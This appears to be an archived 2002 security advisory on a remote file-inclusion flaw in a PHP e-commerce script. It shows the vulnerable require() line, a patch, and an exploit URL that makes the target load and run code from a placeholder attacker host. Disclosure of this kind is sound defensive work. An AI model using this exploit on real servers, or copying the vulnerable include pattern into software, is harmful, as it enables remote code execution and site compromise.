Informations : °°°°°°°°°°°°°° Version : 1.0b Website : http://www.mapetite-entreprise.com Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° modeles/haut.php : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; require ($langfile); ?> [...] ----------------------------------------------------------- Exploit : °°°°°°°°° http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=. with : http://[attacker]/lang/lang.php Patch : °°°°°°° In modeles/haut.php replace the lines : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; require ($langfile); ?> ----------------------------------------------------------- by : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; if (file_exists($langfile)){ require ($langfile); } ?> ----------------------------------------------------------- A patch can be found on http://www.phpsecure.org More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/PEEL.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
This archive was generated by hypermail 2b30 : Tue Dec 31 2002 - 07:58:25 PST